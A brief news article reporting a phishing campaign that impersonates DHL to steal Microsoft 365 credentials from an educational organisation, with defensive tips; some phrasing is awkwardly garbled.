The employee on leave could be your greatest threat to

A new phishing campaign impersonating logistics giant DHL has been uncovered in an attempt to steal victims' Microsoft 365 credentials in the field of education, specialists say.

Armorblox cybersecurity researchers recently uncovered a massive phishing campaign, with more than ten zero emails sent to inboxes belonging to a "private educational corporation."

The email is crafted to look like it's from DHL: It bears the company's branding, like a tone of voice one might associate with the shipping giant. In the email titled "DHL Shipping Document / Invoice Receipt", the recipient is notified that a customer of the service has sent a package to the wrong address and that they must provide the correct shipping address.

Obviously, the email comes with an attachment titled "Shipping Document Invoice Receipt" which, if opened, looks like a murky preview of a Microsoft Excel file.

A Microsoft sign-in page appears above the shady document, attempting to mislead victims into thinking they need to sign in to their Microsoft 365 accounts in order to view the file's contents. If the victims provided the login credentials, they would directly assist the attackers.

“The email attack used language as a primary attack vector to bypass Microsoft Office 365 and EOP email security controls,” Armorblox explained. “These native email security layers can block massive spam and phishing campaigns, such as known malware and malicious URLs. However, this targeted email attack bypassed Microsoft's email security, as it did not include bad URLs or links and included an HTML file containing a malicious phishing form.

As the scholars stated, the attackers used a valid domain that allowed them to bypass Microsoft's mail authentication checks (opens in a new tab).

The best way for companies to guard against phishing attacks is to train their employees to look out for red flags in their inboxes, such as the sender's email address, typos and spelling mistakes in email, sense of urgency (legitimate emails will almost never require the user to respond with urgency), and unexpected links/attachments.

Via: SiliconAngle (opens in a new tab)

Share This